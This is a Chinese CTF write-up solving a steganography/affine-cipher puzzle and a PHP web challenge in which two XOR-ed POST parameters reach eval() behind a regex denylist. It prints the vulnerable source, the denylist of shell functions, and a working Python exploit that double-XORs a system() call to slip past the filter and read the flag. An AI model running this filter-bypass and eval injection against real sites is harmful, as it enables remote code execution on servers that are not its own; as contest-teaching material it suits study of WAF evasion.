1、MISC-eight_birds
题目下载之后发现一张只显示了不到 8 只鸟的 jpg 图片,修改图片高度后发现 affine_b19_b21
然后在图片尾部发现 zip 压缩包,压缩包有密码,尝试伪加密、字典、爆破都不行,最后猜测这个(affine_b19_b21)可能就是密码,试了之后发现确实是,解压得到 flag.txt
AVZHSM{91m4t51vv33h5m18o93t6o4hv86at87v}
发现前缀不是 DASCTF,同时由题目提示中的 affine 联想到仿射密码
得到flag如下:
DASCTF{91f4e51aa33c5f18b93e6b4ca86de87a}
2、WEB-HackMe
WEB 页面只有一个 Hello,于是开始爆破目录
<?php
// Brings waf() into scope; together with the 30-byte length check in HackMe()
// it is the only gate between the POST body and eval().
include "waf.php";
// Silences PHP errors/notices (the argument is the string '0', which PHP
// coerces to 0), so undefined-index notices from HackMe() are not shown.
error_reporting('0');
// Both values come straight from the POST body: attacker-controlled, untrusted.
$str1 = $_POST['str1'];
$str2 = $_POST['str2'];
// Decoded before use; base64 lets the client deliver arbitrary bytes,
// including control characters, in each parameter.
$str1 = base64_decode($str1);
$str2 = base64_decode($str2);
// Byte-wise XORs $str1 with $str2 and, if the result is at most 30 bytes and
// passes waf(), echoes it and hands it to eval().
//
// Security: $str is built entirely from the two POST parameters, so eval($str)
// executes attacker-supplied PHP. waf() is a regex denylist applied to the
// final string (see waf.php); a denylist in front of eval() is not a
// sufficient control — the fix is to remove eval() rather than extend the list.
function HackMe($str1,$str2)
{
$str = "";
// $array1 is never initialised; for an empty $str1 the count() below sees an
// undefined variable (warning and 0, or TypeError, depending on PHP version — verify).
for ($i = 0;$i<strlen($str1);$i++)
{
$array1[$i] = $str1[$i];
}
for ($b = 0;$b<strlen($str2);$b++)
{
$array2[$b] = $str2[$b];
}
// The loop length is driven by $str1 only: when $str2 is shorter, $array2[$c]
// is undefined for the tail and string ^ null is not a byte-wise XOR (the
// operands fall back to integer conversion); exact outcome depends on PHP version — confirm.
for ($c=0;$c <count($array1);$c++)
{
$str = $str.($array1[$c] ^ $array2[$c]);
}
// Length limit is measured on the XOR result, not on the encoded inputs.
if (strlen($str)<=30)
{
if (waf($str))
{
// The payload is reflected to the client before it is executed.
echo $str;
eval($str);
}
else
{
echo "ohhhhhhhhhhhhhhhhhhhhhhhh you can't get flag!!!!";
}
}
else
{
echo "nonono you are sooooooooo lang~";
}
}
// Fallback used only when NEITHER parameter is posted: "(@@@@" ^ "`%,,/" is
// "Hello", the demo output the page shows by default. Because the condition is
// &&, posting just one parameter skips the fallback; the missing one is then a
// missing POST index passed through base64_decode() on the lines above
// (empty string plus a notice/deprecation, depending on PHP version — verify).
if (!isset($_POST['str1']) && !isset($_POST['str2']))
{
$str1="(@@@@";
$str2="`%,,/";
}
HackMe($str1,$str2);
?>
程序需要传入 str1 和 str2 两个字符串,二者按字节异或后得到 str;str 通过 waf 检查且长度不超过 30 之后就会被 eval 执行。测试发现 waf 过滤了大量函数名,但仍然允许输入字母等其他字符(不是无字符 webshell),因此可以先和特定字符 ! 异或来构造,有一部分 payload 可以直接绕过,例如 print_r(scandir('/'))。
然后根据提示发现可以通过两次异或——类似无字符 webshell 那样传入异或后的字符串——来绕过对 system 的过滤。
print_r(scandir('/'));Array
(
[3] => bin
[4] => boot
[5] => dev
[6] => etc
[7] => home
[8] => lib
[9] => lib64
[10] => media
[11] => mnt
[12] => ohhhhhhhhhhhhhh_you_find_it
)
构造方式类似下面这样:
E:\总结汇总\web总结\无字符webshell\异或方式>python3 step2.py
[+] your function:system
[+] your command:ls /
("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%0c%08%00%00"^"%60%7b%20%2f");
("000000"^"CICDU]")("ls /");
然后构造exp如下:
import base64
import requests
# Function name that the one-layer PHP payload reconstructs at runtime.
payload = 'system'
# Same-length key of '0' bytes; XOR-ing the name with it gives payload1.
make_str = '0'*len(payload)
payload1 = ''
for i in range(len(payload)):
    payload1 += chr(ord(payload[i])^ord(make_str[i]))
#print(payload1)
# First layer: PHP source in which the function name is rebuilt as
# ('key' ^ 'xored') and then called with the inner argument string.
payload_1ceng = '''('{}'^'{}')('nl /*t');'''.format(make_str,payload1)
#payload_1ceng = 'print_r(scandir(\'/\'));'
# Second layer: XOR the whole PHP string with a key of '!' bytes. The server
# XORs str1 and str2 back together, so str1 carries the key and str2 the
# XOR-ed text.
make_str2 = '!'*len(payload_1ceng)
payload_2ceng = ''
for i in range(len(payload_1ceng)):
    payload_2ceng += chr(ord(payload_1ceng[i])^ord(make_str2[i]))
# NOTE(review): base64.b64encode() takes bytes on Python 3; passing str raises
# TypeError, so as written these two lines only run under Python 2.
str1 = base64.b64encode(make_str2)
str2 = base64.b64encode(payload_2ceng)
# Printed to check against the server's 30-byte limit on the XOR result.
print(len(payload_1ceng))
session = requests.Session()
url = "http://80.endpoint-7c82c2b23fc14da8b2eda2f33569772e.m.ins.cloud.dasctf.com:81/"
paramsPost = {"str1":str1,"str2":str2}
response = session.post(url=url, data=paramsPost)
print("Status code: %i" % response.status_code)
print("Response body: %s" % response.content)
获取waf.php如下:
1 <?php
// Denylist gate applied to the XOR-assembled string right before eval().
// Returns true when $str matches none of the case-insensitive patterns below,
// false when any of them matches.
// Security: this is a denylist on a string that is about to be eval()'d. It
// refuses a set of function names, keywords and single characters (including
// the letter x, '.', '-', '$' and '%'), but a denylist cannot enumerate every
// way of expressing a call and must not be the only control in front of eval().
function waf($str)
{
    // Case-insensitive (/i) alternation of refused tokens.
    $denylist = "/system|exec|eval|shell_exec|passthru|proc_open|proc_close|proc_get_status|checkdnsrr|getmxrr|getservbyname|getservbyport|syslog|popen|highlight_file|include|require|require_once|readfile|file|put|\.|<|>|\\\|x|-|\+|}|&|%|@|#|\\$|`|~|php|get|post|head|global|:/i";
    // preg_match() yields 1 on a hit, 0 on no hit and false on error;
    // only the no-hit/error case (a falsy result) is allowed through.
    return !preg_match($denylist, $str);
}